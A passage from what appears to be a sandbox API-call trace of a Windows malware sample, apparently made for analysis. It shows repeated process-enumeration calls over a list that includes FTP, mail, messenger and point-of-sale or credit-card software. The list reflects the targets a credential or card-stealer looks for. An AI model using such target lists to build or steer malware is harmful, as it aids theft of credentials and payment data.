pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0170.964] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0170.966] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0170.967] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0170.969] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0170.971] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0171.001] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0171.003] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0171.006] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0171.007] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0171.009] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0171.012] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0171.013] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0171.015] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0171.016] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0171.018] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0171.019] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0171.021] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0171.022] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0171.024] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0171.026] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0171.027] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0171.029] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0171.030] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0171.032] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0171.033] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0171.034] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0171.041] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0171.043] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0171.045] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0171.047] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0171.049] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0171.051] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0171.053] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0171.057] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0171.059] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0171.065] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0171.067] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0171.069] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0171.073] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0171.076] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0171.079] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0171.085] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0171.087] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0171.089] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0171.091] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0171.093] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0171.095] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0171.096] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0171.098] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0171.100] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0171.103] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0171.107] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0171.110] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0171.113] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0171.116] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0171.119] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0171.129] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0171.133] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0171.136] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0171.139] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0171.142] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0171.144] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0171.148] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0171.151] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0171.153] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0171.156] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0171.160] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0171.163] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0171.165] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0171.176] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0171.180] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0171.182] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0171.185] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0171.187] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0171.191] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0171.193] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0171.222] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1398, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0171.225] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0171.228] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0171.230] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0171.233] Process32Next (in: hSnapshot=0x1ebc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0171.235] CloseHandle (hObject=0x1ebc) returned 1 [0171.235] Sleep (dwMilliseconds=0x64) [0171.361] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a84 [0171.373] Process32First (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0171.374] Process32Next (in: hSnapshot=0x1a84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0171.376] Process32Next (in: 